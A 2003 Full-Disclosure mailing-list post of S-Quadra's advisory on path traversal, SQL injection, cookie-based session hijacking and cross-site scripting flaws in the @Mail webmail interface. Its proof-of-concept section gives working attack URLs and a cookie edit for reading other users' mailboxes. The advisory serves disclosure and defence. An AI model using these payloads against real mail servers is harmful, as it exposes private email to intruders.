[Full-Disclosure] @Mail web interface multiple security vulnerabilities

From: S-Quadra Security Research (research_at_s-quadra.com)
Date: 12/09/03

  • Next message: John Cartwright: "[Full-Disclosure] List Charter" 
    To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>
Date: Tue, 09 Dec 2003 14:23:49 +0300

                   S-Quadra Advisory #2003-12-09

    Topic: @Mail web interface multiple security vulnerabilities
    Severity: Average
    Vendor URL: http://www.atmail.com
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20031209.txt
    Release date: 09 Dec 2003

    1. DESCRIPTION

    "@Mail is a feature rich Email solution that allows users to access
    email-resources via the web or a variety of wireless devices. The
    software incorporates a complete email-server package to manage
    and host user email at your domain(s)." -
    www.atmail.com site says.

    2. DETAILS

    Multiple security vulnerabilities has been found in the @Mail web
    interface which could allow a remote attacker in the worst case to gain
    access to user's mailbox.

    @Mail allows two different types of installation:

    a) Flat file install

    All profiles and messages of the @Mail users stored in files.
    This storage method is recommended for user bases < 10,000 users.

    b) SQL database install (MySQL)
    User profiles and messages are stored in a SQL database.

    -- Vulnerability 1: Flat file install - Input validation error

    'showmail.pl' fails to validate 'Folder' request parameter which allows
    an attacker to point it to
    mailbox of any registered user in @Mail system.

    -- Vulnerability 2: SQL database install - Multiple SQL injection
    vulnerabilities

    Multiple SQL Injection vulnerabilities has been found in @Mail web
    interface. User supplied input is not filtered before being used in a
    SQL query. Consequently, query modifications is possible. Successfull
    exploitaion could allow a remote attacker to read any email messages for
    any email address registered in @Mail system.

    Affected scripts - 'atmail.pl', 'search.pl', 'reademail.pl'.

    -- Vulnerability 3: SQL database install - Session hijacking vulnerability

    When user is logs into @Mail through web interface his session id and
    mailbox name are saved in a cookie. Modification of mailbox name allows
    a attacker to gain access to victim's mailbox.
    Victim's session ID must be active for this attack to be successfull.

    -- Vulnerability 4: All types of install - Cross Site Scripting
    vulnerability in 'showmail.pl'

    By injecting specially crafted javascript code in url and tricking a
    user to visit it a remote attacker can steal session id and gain access
    to victim's mailbox.

    3. PoC Code

    -- Vulnerability 1

    Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
    Advanced Server

    The following url will give access to victim@somehost.com's mailbox

    -http://www.site.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

    -- Vulnerability 2

    Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
    Advanced Server

    - through SQL Injection vulnerability in 'search.pl' an attacker can
    find message id for any message of any registered user
    - the following url open message with message id '666' for user
    'victim@atmail.com'

    -http://www.site.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

    -- Vulnerability 3

    Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
    Advanced Server

    1. Attacker logs into @Mail web interface.
    2. Attacker changes mailbox name in a cookie to victim's mailbox name:

    Account&hacker%40somehost.com&SessionID&1064305709fzvpjackee =>
    Account&victim%40somehost.com&SessionID&1064305709fzvpjackee

    3. Attacker opens web interface of victim's email box by visiting the
    following url
       - http://www.site.com/parse.pl?file=html/english/xp/xplogin.html.

    -- Vulnerability 4

    Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
    Advanced Server

    http://www.site.com/showmail.pl?Folder=>alert(document.cookie)</script>

    4. FIX INFORMATION

    S-Quadra alerted @Mail's development team to these issues on 02 Dec
    2003. No response has been received. No fix available.

    5. CREDITS

    Nick Gudov <cipher@s-quadra.com> is responsible for discovering
    this issue.

    6. ABOUT

    S-Quadra offers services in computer security, penetration testing and
    network assesment, web application security, source code review and
    third party product vulnerability assesment, forensic support and
    reverse engineering.

    Security is an art and our goal is to bring responsible and high quality
    security service to the IT market, customized to meet the unique needs
    of each individual client.

    S-Quadra, (pronounced es quadra), is not an acronym.
    It's unique, creative and innovative - just like the security services
    we bring to our clients.

              S-Quadra Advisory #2003-12-09

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter:     http://lists.netsys.com/full-disclosure-charter.html

  • Next message: John Cartwright: "[Full-Disclosure] List Charter"

    Relevant Pages
    • Quantcast